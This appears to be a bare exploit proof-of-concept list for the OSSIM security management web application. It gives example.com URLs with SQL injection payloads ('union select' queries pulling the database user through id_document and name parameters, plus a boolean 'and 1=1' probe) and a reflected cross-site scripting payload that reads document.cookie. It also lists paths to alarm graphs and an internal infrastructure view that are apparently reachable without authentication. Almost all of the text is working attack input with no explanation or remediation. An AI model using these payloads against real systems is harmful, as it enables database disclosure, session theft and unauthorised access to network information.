http://www.example.com/ossim/repository/repository_document.php?id_document=-3 union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1

http://www.example.com/ossim/repository/repository_links.php?id_document=-3 union select 1,user(),3,4,5,6

http://www.example.com/ossim/repository/repository_editdocument.php?id_document=-3 union select 1,user(),3,4,5,6

http://www.example.com/ossim/policy/getpolicy.php?group=0 and 1=1

http://www.example.com/ossim/host/newhostgroupform.php?name=' union select user(),'b','c','d','f

http://www.example.com/ossim/net/modifynetform.php?name=' union select user(),'b','c','d','e','f','g','h','a

http://www.example.com/ossim/?option=0" onload=alert(document.cookie) a="

Access to the graph:
http://www.example.com/ossim/graphs/alarms_events.php

Internal infrastructure view:
http://www.example.com/ossim/host/draw_tree.php